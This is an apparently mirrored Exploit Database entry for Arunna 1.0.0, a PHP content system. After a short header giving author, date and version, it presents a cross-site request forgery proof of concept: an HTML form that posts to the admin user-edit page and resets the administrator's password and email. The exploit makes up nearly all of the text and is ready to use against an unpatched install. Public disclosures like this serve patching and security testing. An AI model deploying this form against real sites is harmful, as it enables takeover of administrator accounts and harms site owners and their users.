Arunna 1.0.0 – ‘Multiple’ Cross-Site Request Forgery (CSRF)

• Exploit Database
• 52 阅读

• 作者： =(L_L)=
  日期： 2021-12-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50608/

• # Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
  # Date: November 29, 2021
  # Exploit Author: =(L_L)=
  # Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/
  # Vendor Homepage: https://github.com/arunna
  # Software Link: https://github.com/arunna/arunna
  # Version: 1.0.0
  # Tested on: Ubuntu 20.04.2 LTS
  
  <!--
  The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on). 
  -->
  
  <html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"><table><tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr><tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr>
  <tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr>
  <tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr>
  <tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr>
  <tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr>
  <tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr>
  <tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr>
  <tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr>
  <tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr>
  <tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr>
  <tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr>
  <tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr>
  <tr><td>tags[0]</td><td><input type="text" value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr>
  <tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr>
  <tr><td>email[0]</td><td><input type="text" value="request@arunna.com" name="email[0]"></td></tr>
  <tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr>
  <tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr>
  <tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr>
  <tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr>
  <tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr>
  <tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr>
  </table><input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"></form></html>